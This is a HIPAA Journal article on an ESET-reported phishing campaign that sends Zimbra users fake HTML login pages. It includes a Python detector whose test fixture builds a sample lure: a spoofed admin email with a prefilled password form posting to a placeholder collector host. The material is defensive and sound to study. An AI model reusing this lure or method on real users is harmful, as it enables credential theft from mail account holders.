The HIPAA Journal is the leading provider of news, updates, and independent advice for HIPAA compliance

Large-Scale Phishing Campaign Targets Zimbra Collaboration Email Servers

Researchers at ESET have identified a large-scale and ongoing phishing campaign targeting Zimbra Collaboration email servers at small- and medium-sized businesses and government agencies. The campaign has been active since at least April and is being conducted globally, with Poland, Ecuador, and Italy the most heavily targeted countries. It does not appear to focus on any particular vertical.

Targets are sent an email with an HTML attachment. The email warns the user about an email server update or another Zimbra issue, such as a security update, and the From field indicates that it was sent by an email server administrator. The user is told to open the HTML attachment; when opened, the page is loaded from a local file path, so the address bar shows a file URL rather than the organization's mail server. The attachment includes the targeted organization's logo and name and a fake Zimbra login page with the username already filled in, so the user is only required to enter a password. If a password is entered, the credentials are sent in an HTTPS POST request to an adversary-controlled server.

The ESET researchers also observed waves of phishing emails being sent from some of the organizations targeted in the campaign, which suggests the threat actor obtained administrator credentials and was able to set up new mailboxes on the compromised servers. The researchers suggest that in these cases the same password may have been used for the mail account and the Zimbra administrator account. While the campaign is not particularly sophisticated, it has proven effective. Because the HTML attachments consist of legitimate code with a single link pointing to a malicious host, and that link sits inside the attachment rather than in the message body, the emails may not be detected as malicious and are likely to pass antispam policies, especially since the targeted organizations are mostly small- to medium-sized businesses that are unlikely to have advanced email security defenses. ESET was unable to attribute the campaign to a known threat actor.
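The two observations above, that the lure is an HTML attachment carrying a login form with the username prefilled rather than a link in the message body, and that filters which only scan body URLs therefore miss it, can be checked directly on the attachment. The Python script below is an added example written for this page; it is not ESET's or The HIPAA Journal's code. The sample message, the addresses and the hostnames in it (example-org.test, collector.example.net) are constructed placeholders. It parses a raw message, records whether the body contains any URL at all, and flags HTML attachments whose forms collect a password and submit it to a host outside the sender's domain and outside a list of trusted webmail hosts.

```python
"""Flag Zimbra-style credential-harvesting HTML attachments.

Added example for this article, not code from ESET or The HIPAA Journal.
The sample message, addresses and hostnames below are constructed placeholders.
"""
import email
import re
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def build_sample_message(org_domain="example-org.test",
                         collector="collector.example.net"):
    """Construct a lure like the one described: an admin-looking sender, a
    body with no links, and an HTML attachment holding a fake login form
    (username prefilled, password empty) that POSTs to a different host."""
    msg = EmailMessage()
    msg["From"] = f"Zimbra Administrator <admin@{org_domain}>"
    msg["To"] = f"jane.doe@{org_domain}"
    msg["Subject"] = "Zimbra security update - action required"
    msg.set_content("A security update is pending for your mailbox.\n"
                    "Open the attached file and sign in to continue.\n")
    html = (
        "<html><body>\n"
        f'<img src="logo.png" alt="{org_domain}">\n'
        f"<h2>{org_domain} mail</h2>\n"
        f'<form method="POST" action="https://{collector}/zimbra/login">\n'
        f'  <input type="text" name="username" value="jane.doe@{org_domain}">\n'
        '  <input type="password" name="password">\n'
        '  <input type="submit" value="Sign in">\n'
        "</form></body></html>\n"
    )
    msg.add_attachment(html, subtype="html", filename="Zimbra_update.html")
    return msg


class FormScanner(HTMLParser):
    """Collect each <form>: its action, method, number of password inputs,
    and the names of text/email inputs that arrive with a value prefilled."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""),
                          "method": a.get("method", "GET").upper(),
                          "password_fields": 0, "prefilled": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            itype = a.get("type", "text").lower()
            if itype == "password":
                self._form["password_fields"] += 1
            elif itype in ("text", "email") and a.get("value"):
                self._form["prefilled"].append(a.get("name", ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def scan_message(msg, trusted_hosts=()):
    """Return the URLs found in the body and every HTML-attachment form that
    collects a password and submits it to a host that is neither within the
    sender's domain nor in trusted_hosts (your own webmail hosts)."""
    sender_domain = parseaddr(msg["From"] or "")[1].rpartition("@")[2].lower()
    trusted = {h.lower() for h in trusted_hosts}
    body = msg.get_body(preferencelist=("plain", "html"))
    body_urls = URL_RE.findall(body.get_content()) if body else []
    findings = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        scanner = FormScanner()
        scanner.feed(part.get_content())
        for form in scanner.forms:
            host = (urlparse(form["action"]).hostname or "").lower()
            own = bool(sender_domain) and (
                host == sender_domain or host.endswith("." + sender_domain))
            if form["password_fields"] and host and not own and host not in trusted:
                findings.append({"filename": part.get_filename(),
                                 "action_host": host,
                                 "method": form["method"],
                                 "prefilled": form["prefilled"]})
    return {"body_urls": body_urls, "suspicious_forms": findings}


def scan_raw(raw_bytes, trusted_hosts=()):
    """Entry point for a mail pipeline: parse raw RFC 5322 bytes, then scan."""
    parsed = email.message_from_bytes(raw_bytes, policy=policy.default)
    return scan_message(parsed, trusted_hosts)


if __name__ == "__main__":
    print(scan_raw(build_sample_message().as_bytes()))
```

The sender-domain comparison is only a convenience for the example: the From header in this campaign is spoofed to look like an administrator, so it must not be trusted on its own. In production, pass the organization's real webmail hosts in trusted_hosts and treat any password form in an attachment that posts anywhere else as suspicious, whatever the headers claim.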

Author: Steve Alder is the editor-in-chief of HIPAA Journal. Steve is responsible for editorial policy regarding the topics covered in The HIPAA Journal. He is a specialist on healthcare industry legal and regulatory affairs, and has 10 years of experience writing about HIPAA and other related legal topics. Steve has developed a deep understanding of regulatory issues surrounding the use of information technology in the healthcare industry and has written hundreds of articles on HIPAA-related topics. Steve shapes the editorial policy of The HIPAA Journal, ensuring its comprehensive coverage of critical topics. Steve Alder is considered an authority in the healthcare industry on HIPAA. The HIPAA Journal has evolved into the leading independent authority on HIPAA under Steve’s editorial leadership. Steve manages a team of writers and is responsible for the factual and legal accuracy of all content published on The HIPAA Journal. Steve holds a Bachelor’s of Science degree from the University of Liverpool. You can connect with Steve via LinkedIn or email via stevealder(at)hipaajournal.com
